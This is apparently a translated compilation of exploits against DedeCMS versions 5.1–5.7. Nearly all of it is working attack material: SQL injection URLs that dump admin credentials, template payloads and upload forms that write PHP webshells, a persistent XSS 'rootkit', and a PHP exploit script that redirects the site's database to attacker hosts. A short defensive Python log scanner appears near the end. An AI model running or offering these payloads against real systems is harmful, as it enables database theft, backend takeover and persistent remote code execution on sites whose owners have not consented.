Dedecms 5.6 rss injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
DedeCms v5.6 embedded malicious code execution vulnerability
Register as a member and upload a piece of software; in the "local address" field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php with password xiao, writing a one-line shell directly.
Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
DEDECMS all versions gotopage parameter XSS vulnerability
1. Copy and paste the URL below into the browser to trigger the XSS and install the XSS rootkit. Note that IE8/9 and similar browsers block URL-based XSS, so the XSS filter must be disabled.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
2. Close the browser; whichever of the URLs below you then visit, our XSS is triggered.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php
DeDeCMS (织梦) variable override getshell
#!/usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author: www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
// Getshell returns only the first response line; "OK" is echoed by the injected tag
if (strpos($exp,"OK")>12){
echo "
Exploit Success \n";
if($aid==1)echo "
Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "
Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "
Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "
Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
// POST body: the _COOKIE[GLOBALS][cfg_*] keys override the site's database configuration
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "
No response from ".$host."\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>
DedeCms v5.6-5.7 privilege bypass vulnerability (direct entry to the backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
Change validate=dcug above to the current captcha value to enter the site backend directly.
The prerequisite for this vulnerability is that the backend path must be known.
Dedecms 织梦 tag remote file write vulnerability
Prerequisite: prepare your own dede database, then insert the data: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
Then submit with the form below; the shell is 1.php in the same directory. Work out the principle yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
Dedecms <= V5.6 Final template execution vulnerability
Register a user, enter the member backend, publish an article, upload an image, then in attachment management replace the image with our crafted template; for example, the image name is:
uploads/userup/2/12OMX04-15A.jpg
The template content is (if the image format is restricted, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source, and build a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>
<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)
<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(construct this part)
</div>
<!-- form action area -->
<h3 class="meTitle">详细内容</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>
</div>
</form>
Submit; if the site reports that the edit succeeded, we have changed the template path. 3. Visit the edited article:
Assuming the aid of the article just edited is 2, we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.
DEDECMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>
Build the form above; after uploading, the image is saved as /uploads/userup/3/1.gif.
Publish an article, then build the edit form as follows:
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>
织梦 (Dedecms) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
织梦 (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../
DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The stored password is the 32-character MD5 with the first 5 and the last 7 characters removed, giving a 20-character MD5 value; from that, remove 3 characters from the front and 1 from the end to get the 16-character MD5.
织梦 (Dedecms) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
织梦 (Dedecms) select_soft_post.php page uninitialised variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>
织梦 (dedecms) 5.3 – 5.5 plus/digg_frame.php injection vulnerability
It exploits the error raised by a numeric overflow in a MySQL field, together with DEDECMS recording database error messages in a PHP file whose header is not validated.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message is then visible.
2. Visit http://www.abc.com/data/mysql_error_trace.php; seeing the following information proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
3. Run the file test.html from dede.rar; note that the action address in the form is
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">
After clicking OK, seeing the same information as in step 2 means the file trojan was uploaded successfully.
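As an added defensive example (not part of the original post and not DedeCMS code), the Python below scans access-log lines for the two request patterns the sections above depend on: parameter names that overwrite GLOBALS/cfg_* variables (the mytag_js.php, login.php, rss.php and select_soft_post.php cases) and PHP tags placed in parameter values so they land in the PHP-formatted error log (the digg_frame.php case). The log lines, the 203.0.113.0/24 addresses and the reason labels are constructed for the example; access logs do not record POST bodies, so body-based attempts need the same check at the application or WAF layer.

```python
"""Flag DedeCMS global-override keys and PHP-tag values in access logs.
Added example for this page; not DedeCMS code."""
import re
from urllib.parse import parse_qsl, urlsplit

# Combined-log-format request line: client IP, timestamp, "METHOD target HTTP/x".
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)
# Opening or closing PHP tags inside a parameter value (error-log poisoning).
PHP_TAG_RE = re.compile(r'<\?(php)?|\?>', re.I)


def suspicious_key(key: str) -> bool:
    """A parameter name no client should send: it targets a superglobal, a
    GLOBALS entry or a cfg_* configuration variable, which a register_globals
    style extraction loop would then overwrite."""
    base = key.split('[', 1)[0]
    segments = re.findall(r'\[([^\]]*)\]', key)
    return (base.startswith('_')                 # _COOKIE[...], _POST[...], _Cs[...]
            or base.upper() == 'GLOBALS'
            or base.lower().startswith('cfg_')   # cfg_dbhost, cfg_basedir, cfg_imgtype
            or any(s.upper() == 'GLOBALS' for s in segments))


def suspicious_value(value: str) -> bool:
    """A value carrying PHP tags, e.g. '*/eval($_POST[x])?>' aimed at a PHP error log."""
    return PHP_TAG_RE.search(value) is not None


def scan_log(text: str) -> list:
    """Return one finding per offending query parameter, in log order."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        target = urlsplit(m.group('target'))
        for key, value in parse_qsl(target.query, keep_blank_values=True):
            reasons = []
            if suspicious_key(key):
                reasons.append('global-override-key')
            if suspicious_value(value):
                reasons.append('php-tag-in-value')
            if reasons:
                findings.append({'ip': m.group('ip'), 'path': target.path,
                                 'key': key, 'reasons': reasons})
    return findings


# Constructed sample lines (not captured traffic); 203.0.113.0/24 is a documentation range.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /plus/mytag_js.php?aid=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /dede/login.php?dopost=login&userid=admin&pwd=x&_POST[GLOBALS][cfg_dbhost]=203.0.113.99 HTTP/1.1" 200 1024 "-" "curl/8.0"
203.0.113.9 - - [01/Jan/2024:10:00:03 +0000] "POST /plus/mytag_js.php?aid=1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit HTTP/1.1" 200 77 "-" "Mozilla/5.0"
203.0.113.3 - - [01/Jan/2024:10:00:04 +0000] "GET /plus/rss.php?tid=1&_Cs[][1]=1 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.4 - - [01/Jan/2024:10:00:05 +0000] "POST /include/dialog/select_soft_post.php?cfg_basedir=../../&newname=fly.php HTTP/1.1" 200 90 "-" "Mozilla/5.0"
203.0.113.8 - - [01/Jan/2024:10:00:06 +0000] "GET /plus/digg_frame.php?aid=1024e1024&mid=*/eval($_POST[x])?> HTTP/1.1" 500 300 "-" "Mozilla/5.0"
"""

if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']:<14} {f['path']:<40} {f['key']:<32} {','.join(f['reasons'])}")
```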
织梦 (DedeCms) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*